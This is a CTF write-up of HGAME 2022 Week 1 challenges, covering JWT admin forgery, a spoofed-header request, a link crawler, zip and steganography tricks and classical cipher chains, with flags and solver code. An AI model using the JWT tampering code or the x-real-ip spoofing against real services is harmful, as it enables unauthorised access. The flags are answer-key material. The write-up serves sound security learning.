Table of contents

- Level - Week1
  - WEB
    - easy_auth
    - 蛛蛛…嘿嘿?我的蛛蛛 (Spider… hehe, my spider)
    - Tetris plus
    - Fujiwara Tofu Shop
  - MISC
    - 欢迎欢迎!热烈欢迎! (Welcome, a warm welcome!)
    - 这个压缩包有点麻烦 (This zip is a bit of a pain)
    - 好康的流量 (Traffic worth a look)
    - 群青(其实是幽灵东京) (Gunjou, actually Ghost Tokyo)
  - CRYPTO
    - Dancing Line
    - Matryoshka
    - English Novel
- Level - Week2
  - WEB
    - Apache!
    - webpack-engine
    - At0m的留言板 (At0m's message board)
    - 一本单词书 (A vocabulary book)
    - Pokemon
  - MISC
    - 一张怪怪的名片 (A strange business card)
    - 你上当了 我的很大 (Gotcha, mine is very big)
- Level - Week3
  - MISC
    - 卡中毒 (Lagging and infected)
    - 谁不喜欢猫猫呢 (Who doesn't like cats?)
  - WEB
    - SecurityCenter
    - Vidar shop demo
    - LoginMe
- Level - Week4
This was a beginner competition, so I didn't keep the challenge attachments; here is a brief record of how each one was solved.
## Level - Week1

### WEB

#### easy_auth
![在这里插入图片描述](https://img-blog.csdnimg.cn/437ae023fa6d495d9a4e32d2280e6506.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/5f12dcd0ea384d818901aa3b80f88e84.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
There is an admin user. Create any task, click doing, and capture the resulting GET request.
![在这里插入图片描述](https://img-blog.csdnimg.cn/567c4309a0de473baf0e024efa08b48c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The token format is obviously a JWT: https://jwt.io/
![在这里插入图片描述](https://img-blog.csdnimg.cn/c6bc7518235848fd89661ba93b49c50f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Change ID to 1 and Username to admin, then send the edited JWT to get the flag. The edited token is accepted as-is, which means the server never verifies the signature; with signature checking in place this edit would be rejected.
![在这里插入图片描述](https://img-blog.csdnimg.cn/8fc53ded88fd484596142e74afb6c9dd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
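The edit-and-resend trick above only works because the server does not check the signature. The block below is an added example, not part of the original write-up and not the challenge's code: it shows the two usual ways such a token is forged (setting alg to none, or editing the claims and keeping the now-stale signature) next to a strict HS256 verifier that rejects both. The secret and the claim values are constructed for the demo; the real key is unknown.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_unverified(token: str):
    """What jwt.io shows you: header and claims, with no signature check at all."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issue a properly signed token (stands in for the challenge server)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, claims)
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def tamper(token: str, new_claims: dict, alg_none: bool) -> str:
    """Rewrite the claims of an existing token without knowing the secret.

    alg_none=True  -> header alg becomes "none" and the signature is dropped
    alg_none=False -> claims are edited but the original (stale) signature is kept
    """
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    claims = json.loads(b64url_decode(payload_b64))
    claims.update(new_claims)
    if alg_none:
        header["alg"] = "none"
        sig_b64 = ""
    return ".".join([
        b64url_encode(json.dumps(header, separators=(",", ":")).encode()),
        b64url_encode(json.dumps(claims, separators=(",", ":")).encode()),
        sig_b64,
    ])


def verify_hs256(token: str, secret: bytes) -> dict:
    """Strict verifier: pins the algorithm and compares the MAC in constant time."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # never let the token choose "none"
        raise ValueError("unexpected alg")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(payload_b64))


def accepts(token: str, secret: bytes) -> bool:
    try:
        verify_hs256(token, secret)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    secret = b"server-side-secret"  # constructed for the demo
    token = sign_hs256({"ID": 2, "Username": "guest"}, secret)
    forged = tamper(token, {"ID": 1, "Username": "admin"}, alg_none=True)
    print(decode_unverified(forged)[1])  # what a server that skips verification trusts
    print(accepts(forged, secret))       # what a correct server answers: False
```

The verifier pins the algorithm before looking at the signature; accepting whatever alg the token names is how both the none trick and key-confusion attacks get in.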
#### 蛛蛛…嘿嘿我的蛛蛛 (Spider… hehe, my spider)
![在这里插入图片描述](https://img-blog.csdnimg.cn/67bc12e7be4446a79270a41826e4593b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
```python
import re
import requests

init_url = "https://hgame-spider.vidar.club/8983cb3acd"
href_re = re.compile(r'href="(.*?)"')
link = ""
while True:
    res_url = init_url + link
    resp = requests.get(url=res_url)
    print(res_url)
    # Follow the first non-empty href on the page; stop when there is none left.
    links = [i for i in href_re.findall(resp.text) if i != ""]
    if not links:
        break
    link = links[0]

# The flag is in the response headers of the final page, not in its body.
for name, value in resp.headers.items():
    print(f"{name}: {value}")
```
Visit the last address printed; the flag is in its response headers.
![在这里插入图片描述](https://img-blog.csdnimg.cn/9884f7c17d6748c88644d28975788db7.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
#### Tetris plus
![在这里插入图片描述](https://img-blog.csdnimg.cn/34d07606f4604fb29ffb49a72d553858.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
cheking.js contains a commented-out block of JSFuck.
![在这里插入图片描述](https://img-blog.csdnimg.cn/c3677e01d4a644bfa4102010fc727b24.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Paste it into the browser console and press Enter to get the flag. If you would rather not execute unknown JavaScript, drop the trailing `()`: standard JSFuck output of the form `[]["filter"]["constructor"](...)()` then evaluates to the Function object instead of running it, and its `.toString()` shows the decoded source.
![在这里插入图片描述](https://img-blog.csdnimg.cn/1b467e9b8f144f23b5f17bb423a514f8.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
#### Fujiwara Tofu Shop
![在这里插入图片描述](https://img-blog.csdnimg.cn/ae6f102d91584d1495dfc5370dab328c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The request that passes every check. The application takes x-real-ip from the client as the real address, which is only safe when a reverse proxy the application controls sets that header:

```http
GET / HTTP/1.1
Host: shop.summ3r.top
User-Agent: Hachi-Roku
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
referer:qiumingshan.net
Cookie: flavor=Raspberry;
gasoline:100
x-real-ip:127.0.0.1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/5d3022c54a234ad68a9e632dc42a6d48.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
### MISC

#### 欢迎欢迎!热烈欢迎! (Welcome, a warm welcome!)
![在这里插入图片描述](https://img-blog.csdnimg.cn/f3962cd759484403a4364ea7029bd79e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/3a6d91e4877f4553857aaa802fd732fb.png)
hgame{We1com3_t0_HG@ME_2O22}
#### 这个压缩包有点麻烦 (This zip is a bit of a pain)
![在这里插入图片描述](https://img-blog.csdnimg.cn/b87795fd7fde43e097e21ccf21b38342.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/9a0cda9853064089a79fb616fd59eadf.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/dfe74bb503324a3e9a7b32acb7b1b909.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
README.txt reads: "I don't know if it's a good idea to write down all the passwords."

So use password-note.txt as the wordlist and brute-force the archive password.
![在这里插入图片描述](https://img-blog.csdnimg.cn/c112e0422c8547ecad18fea3775f079d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Next layer: a known-plaintext attack.
![在这里插入图片描述](https://img-blog.csdnimg.cn/0245c2dc888244ba8ca64d97b99c52ec.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/e207170361d1413c92af3f6a7eff1e3c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_19,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/e5ccd67299774e698c4b02667ed71dfd.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/0f38fcf47fee4ece88595c696e0f030f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/0a069aed9e7b45cbac3172d331c690ce.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Unlike ordinary pseudo-encryption, the archive carved out here also has the general purpose bit flag altered in the local file header (the data area), so 7z and similar tools cannot simply ignore the fake encryption and extract.

Setting the general purpose bit flag in the central directory to an even value (clearing bit 0, the "encrypted" bit) fixes it; in practice clear it in both header copies.
![在这里插入图片描述](https://img-blog.csdnimg.cn/0b61e14206e84f9796aa688a1a2eeb83.png)
hgame{W0w!_y0U_Kn0w_z1p_3ncrYpt!}
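The flag-bit repair above can be scripted instead of done in a hex editor. The following is an added example, not from the original write-up: it walks the central directory of a zip, clears bit 0 of the general purpose flag in both the central entry and the matching local file header, and confirms with Python's zipfile module that the archive is readable again. The sample archive is constructed in memory; the challenge file itself is not reproduced.

```python
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"    # local file header
CENTRAL_SIG = b"PK\x01\x02"  # central directory file header
EOCD_SIG = b"PK\x05\x06"     # end of central directory record


def _walk_entries(buf: bytearray):
    """Yield (central_header_offset, local_header_offset) for every entry.

    Driving off the central directory, rather than scanning for 'PK' bytes,
    means a signature-like pattern inside compressed data cannot mislead us.
    """
    eocd = buf.rfind(EOCD_SIG)
    if eocd == -1:
        raise ValueError("no end-of-central-directory record")
    (entries,) = struct.unpack_from("<H", buf, eocd + 10)
    (cd_offset,) = struct.unpack_from("<I", buf, eocd + 16)
    pos = cd_offset
    for _ in range(entries):
        if buf[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError(f"bad central directory signature at {pos}")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", buf, pos + 28)
        (local_off,) = struct.unpack_from("<I", buf, pos + 42)
        if buf[local_off:local_off + 4] != LOCAL_SIG:
            raise ValueError(f"bad local header signature at {local_off}")
        yield pos, local_off
        pos += 46 + name_len + extra_len + comment_len


def set_flag_bit0(data: bytes, value: bool):
    """Set or clear bit 0 (encrypted) of the general purpose flag in BOTH the
    central directory entry (offset 8) and the local file header (offset 6).
    Returns the patched bytes and the number of flag words that changed."""
    buf = bytearray(data)
    changed = 0
    for cd_pos, local_pos in _walk_entries(buf):
        for off in (cd_pos + 8, local_pos + 6):
            (flags,) = struct.unpack_from("<H", buf, off)
            new_flags = (flags | 1) if value else (flags & ~1)
            if new_flags != flags:
                struct.pack_into("<H", buf, off, new_flags)
                changed += 1
    return bytes(buf), changed


def clear_fake_encryption(data: bytes):
    return set_flag_bit0(data, False)


def make_fake_encrypted_zip(name: str, content: bytes) -> bytes:
    """Constructed sample: a normal archive whose encrypted bit is then forced
    on in both header copies, mirroring what the challenge archive looked like."""
    mem = io.BytesIO()
    with zipfile.ZipFile(mem, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, content)
    broken, _ = set_flag_bit0(mem.getvalue(), True)
    return broken


def is_marked_encrypted(data: bytes) -> bool:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return all(info.flag_bits & 1 for info in zf.infolist())


def read_member(data: bytes, name: str) -> bytes:
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


if __name__ == "__main__":
    broken = make_fake_encrypted_zip("flag.txt", b"hgame{example}")
    print("marked encrypted:", is_marked_encrypted(broken))
    fixed, n = clear_fake_encryption(broken)
    print(f"cleared {n} flag words ->", read_member(fixed, "flag.txt"))
```

Real encryption also changes the data itself (a 12-byte header is prepended and the stream is enciphered), so if the member still fails its CRC after the flag is cleared, the archive was actually encrypted and this is not the fix.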
#### 好康的流量 (Traffic worth a look)
![在这里插入图片描述](https://img-blog.csdnimg.cn/725b35af7b3d44b29f0eb30633a97393.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/2f129150bd974968960ca3e3a998344d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
- https://the-x.cn/zh-cn/base64/
![在这里插入图片描述](https://img-blog.csdnimg.cn/24c895c4441c4c38afe5dc8ef76719f7.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/14ab3b28a084442eb60dc89a456ff56b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/67b2bc0d687f47aa9925dfa54b87ab5d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{ez_1mg_
The other half of the flag is in the LSB plane; check it with zsteg.
![在这里插入图片描述](https://img-blog.csdnimg.cn/fc03bef9ad1043d1b4d6dd1cb2b8c235.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{ez_1mg_Steg4n0graphy}
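Two manual steps in this challenge are worth having as code: identifying what a base64 blob pulled out of the traffic is (the web tool does this from the magic bytes) and reading the LSB plane that zsteg labels b1,rgb,lsb,xy. The block below is an added example, not part of the write-up; it works on plain lists of RGB tuples so it does not need Pillow, and both the cover image and the payload are constructed.

```python
import base64

# File-type magic numbers worth checking on a blob pulled out of a pcap.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"PK\x03\x04": "zip",
    b"%PDF": "pdf",
    b"BM": "bmp",
}


def sniff_type(data: bytes) -> str:
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def decode_blob(text: str):
    """Base64-decode a blob copied out of a stream (whitespace and missing
    padding tolerated) and report what its magic bytes say it is."""
    compact = "".join(text.split())
    data = base64.b64decode(compact + "=" * (-len(compact) % 4))
    return data, sniff_type(data)


def lsb_extract(pixels, channels=(0, 1, 2)) -> bytes:
    """Read the least significant bit of each selected channel, row by row and
    left to right, and pack the bits MSB-first into bytes (the traversal
    zsteg reports as b1,rgb,lsb,xy)."""
    bits = []
    for row in pixels:
        for px in row:
            for ch in channels:
                bits.append(px[ch] & 1)
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        byte = 0
        for b in bits[i:i + 8]:
            byte = (byte << 1) | b
        out.append(byte)
    return bytes(out)


def lsb_embed(pixels, payload: bytes, channels=(0, 1, 2)):
    """Inverse of lsb_extract; used here only to build a constructed sample."""
    bits = [(byte >> (7 - k)) & 1 for byte in payload for k in range(8)]
    it = iter(bits)
    new_rows = []
    for row in pixels:
        new_row = []
        for px in row:
            px = list(px)
            for ch in channels:
                bit = next(it, None)
                if bit is not None:
                    px[ch] = (px[ch] & ~1) | bit
            new_row.append(tuple(px))
        new_rows.append(new_row)
    return new_rows


def printable_prefix(data: bytes) -> str:
    """Everything up to the first NUL, if it is printable ASCII; else ''."""
    text = data.split(b"\x00", 1)[0]
    return text.decode("ascii") if all(32 <= b < 127 for b in text) else ""


def demo() -> str:
    # Constructed cover image: an 8x8 RGB gradient, not a real picture.
    cover = [[(x * 30 % 256, y * 30 % 256, (x + y) * 15 % 256) for x in range(8)]
             for y in range(8)]
    stego = lsb_embed(cover, b"Steg4n0graphy}\x00")
    return printable_prefix(lsb_extract(stego))
```

zsteg tries many channel orders and bit orders; this block fixes one of them, so when porting it to a real image, match the order zsteg reported for the hit.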
#### 群青(其实是幽灵东京) (Gunjou, actually Ghost Tokyo)
![在这里插入图片描述](https://img-blog.csdnimg.cn/fcc76b789a3f48db9a8c77597d904bc0.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
The spectrogram reveals the password: Yoasobi
![在这里插入图片描述](https://img-blog.csdnimg.cn/9f8d8002199a4492a23252a63a8d433f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Audio LSB steganography: decoding with SilentEye gives a URL.
![在这里插入图片描述](https://img-blog.csdnimg.cn/30633af4b59240c3971361893844abb2.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
- https://potat0-1308188104.cos.ap-shanghai.myqcloud.com/Week1/S_S_T_V.wav
It sounds like SSTV; decode it as Robot36 straight from the audio.
![在这里插入图片描述](https://img-blog.csdnimg.cn/cec340e3a4b44cb5a61d65f7ea80cb04.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{1_c4n_5ee_the_wav}
### CRYPTO

#### Dancing Line
![在这里插入图片描述](https://img-blog.csdnimg.cn/7e384a55ec0c4f4085ec622f1768364e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/d72b5fc722df47c1adb45c826f2a5145.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
A one-pixel step along the X axis is recorded as 0, a one-pixel step along the Y axis as 1.
```python
from PIL import Image

img = Image.open('flag.bmp')
width, height = img.size
bin_data = ''
num_list = []
n = 0
# Walk the image column by column and record the linear index of every
# non-white pixel (the line itself).
for w in range(width):
    for h in range(height):
        pix = img.getpixel((w, h))
        if pix != (255, 255, 255):
            num_list.append(n)
        n += 1
# Two consecutive line pixels whose indices differ by a whole column or more
# are a step along X (bit 0); otherwise the step is along Y (bit 1).
for i in range(len(num_list) - 1):
    if (num_list[i + 1] - num_list[i]) >= height:
        bin_data += '0'
    else:
        bin_data += '1'
print("[+]binary data: {}".format(bin_data))
flag = ''
for i in range(0, len(bin_data), 8):
    flag += chr(int(bin_data[i:i + 8], 2))
print(flag)
```
```
PS C:\Users\Administrator\Downloads> python .\code.py
[+]binary data: 01101000011001110110000101101101011001010111101101000100011000010110111001100011001100010110111001100111010111110100110000110001011011100110010101011111001100010011010101011111011001100111010101101110001011000101111100110001001101010110111000100111011101000101111100110001011101000011111101111101
hgame{Danc1ng_L1ne_15_fun,_15n't_1t?}
```
#### Matryoshka
![在这里插入图片描述](https://img-blog.csdnimg.cn/41d116be7d3341848eec3a47b0be3161.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
![在这里插入图片描述](https://img-blog.csdnimg.cn/13d5fb1484ca42919af91a1e673a6e50.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
It looks like Braille but is actually Morse code, which then has to be reversed.
![在这里插入图片描述](https://img-blog.csdnimg.cn/1f355d634ff847adaee4cbd5549f06f9.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
- http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx

Decoding the Morse gives hex:
![在这里插入图片描述](https://img-blog.csdnimg.cn/d4cd256a70864328ac113f0015595f8f.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
466642756645466E6D4C73364433736959744C3658327034694E306364536C796B6D3972514E396F4D53316A6B7339724B3252366B4C38686F72303D
Hex to ASCII gives:
FfBufEFnmLs6D3siYtL6X2p4iN0cdSlykm9rQN9oMS1jks9rK2R6kL8hor0=
Vigenère decryption (key: hgame) gives:
YzBibXZnaHl6X3swUmF6X2d4eG0wdGhrem9fMG9iMG1fdm9rY2N6dF8hcn0=
Base64 decoding gives:
c0bmvghyz_{0Raz_gxxm0thkzo_0ob0m_vokcczt_!r}
Rail fence decryption (group size 22) gives:
cbvhz{Rzgx0hz_o0_ocz_r0mgy_0a_xmtko0bmvkct!}
Caesar decryption (shift 21) gives:
hgame{Welc0me_t0_the_w0rld_0f_crypt0graphy!}
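The whole chain can be reproduced end to end. This is an added example, not from the original write-up: starting from the hex that the Morse decodes to (the Morse itself is not reproduced here), it applies the Vigenère, base64, fence and Caesar steps with the parameters given above and returns every intermediate value so each stage can be checked against the one written up. The fence step is the "group size N" variant used by Chinese CTF tools (plaintext written in rows of N, read off column by column), and the Vigenère advances its key only on letters, which is why the digits and "=" survive unchanged.

```python
import base64
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase


def shift_letter(ch: str, k: int) -> str:
    """Shift one letter by k positions (negative to decrypt); leave other
    characters untouched."""
    if ch in UPPER:
        return UPPER[(UPPER.index(ch) + k) % 26]
    if ch in LOWER:
        return LOWER[(LOWER.index(ch) + k) % 26]
    return ch


def vigenere_decrypt(text: str, key: str) -> str:
    """Classic Vigenere: the key advances only on letters, so digits, '=' and
    other symbols pass through without consuming a key character."""
    out, j = [], 0
    for ch in text:
        if ch.isalpha():
            k = ord(key[j % len(key)].lower()) - ord("a")
            out.append(shift_letter(ch, -k))
            j += 1
        else:
            out.append(ch)
    return "".join(out)


def fence_decrypt(text: str, group: int) -> str:
    """Undo the 'group size N' fence: the plaintext was written in rows of N
    characters and the ciphertext read off column by column."""
    if len(text) % group:
        raise ValueError("fence_decrypt expects len(text) to be a multiple of group")
    rows = len(text) // group
    cols = [text[i * rows:(i + 1) * rows] for i in range(group)]
    return "".join(cols[c][r] for r in range(rows) for c in range(group))


def caesar_decrypt(text: str, shift: int) -> str:
    return "".join(shift_letter(ch, -shift) for ch in text)


def solve(hex_text: str) -> dict:
    """Run the chain and return every intermediate value by stage name."""
    stages = {}
    stages["ascii"] = bytes.fromhex(hex_text).decode()
    stages["vigenere"] = vigenere_decrypt(stages["ascii"], "hgame")
    stages["base64"] = base64.b64decode(stages["vigenere"]).decode()
    stages["fence"] = fence_decrypt(stages["base64"], 22)
    stages["flag"] = caesar_decrypt(stages["fence"], 21)
    return stages


# The hex string the Morse decodes to, copied from the write-up above.
MORSE_AS_HEX = (
    "466642756645466E6D4C73364433736959744C3658327034694E306364536C796B6D39"
    "72514E396F4D53316A6B7339724B3252366B4C38686F72303D"
)

if __name__ == "__main__":
    for name, value in solve(MORSE_AS_HEX).items():
        print(f"{name:>9}: {value}")
```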
#### English Novel
![在这里插入图片描述](https://img-blog.csdnimg.cn/5b49b5bf91694e8a86f7301bbf0dc5ca.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
Given the ciphertext, the plaintext and the encryption algorithm, recover the key, then use it to decrypt flag.enc.
```python
import os


def same_shape(ori_content, enc_content):
    """A ciphertext can only belong to a plaintext of the same length whose
    letters keep their case and whose non-letters are untouched."""
    if len(ori_content) != len(enc_content):
        return False
    for o, e in zip(ori_content, enc_content):
        if o == e:
            continue
        if o.isupper() and e.isupper():
            continue
        if o.islower() and e.islower():
            continue
        return False
    return True


def match_process(ori_folder, enc_folder):
    """Pair every plaintext novel with the ciphertext(s) matching its shape."""
    all_match = []
    encrypt_list = os.listdir(enc_folder)
    for ori_name in os.listdir(ori_folder):
        ori_path = os.path.join(ori_folder, ori_name)
        with open(ori_path, 'r') as f:
            ori_content = f.read()
        # Iterate over a copy: entries are removed from encrypt_list once matched.
        for enc_name in list(encrypt_list):
            enc_path = os.path.join(enc_folder, enc_name)
            with open(enc_path, 'r') as f:
                enc_content = f.read()
            if same_shape(ori_content, enc_content):
                all_match.append([ori_path, enc_path])
                encrypt_list.remove(enc_name)
    return all_match


def decrypt(ori_data, enc_data, enc_flag):
    """Known-plaintext attack: recover the per-position shift from a matched
    plaintext/ciphertext pair and undo it on flag.enc."""
    keys = [ord(e) - ord(o) for o, e in zip(ori_data, enc_data)]
    result = ""
    for i, c in enumerate(enc_flag):
        if c.isupper():
            result += chr((ord(c) - ord('A') - keys[i]) % 26 + ord('A'))
        elif c.islower():
            result += chr((ord(c) - ord('a') - keys[i]) % 26 + ord('a'))
        else:
            result += c
    return result


if __name__ == '__main__':
    ori_folder = './original'
    enc_folder = './encrypt'
    with open('./flag.enc', 'r') as f:
        enc_flag = f.read()
    for ori_path, enc_path in match_process(ori_folder, enc_folder):
        with open(ori_path, 'r') as f:
            ori_data = f.read()
        with open(enc_path, 'r') as f:
            enc_data = f.read()
        flag = decrypt(ori_data, enc_data, enc_flag)
        print("{:<30}{:<30}{:<30}".format(ori_path, enc_path, flag))
```
![在这里插入图片描述](https://img-blog.csdnimg.cn/d1e4d45581f04fdc85da843cfffecec5.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
hgame{D0_y0u_kn0w_'Kn0wn-pla1ntext_attack'?}
## Level - Week2

### WEB

#### Apache!
![在这里插入图片描述](https://img-blog.csdnimg.cn/a9d701e7e4574d4daee95e296b8b03ef.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5pyrIOWInQ==,size_20,color_FFFFFF,t_70,g_se,x_16)
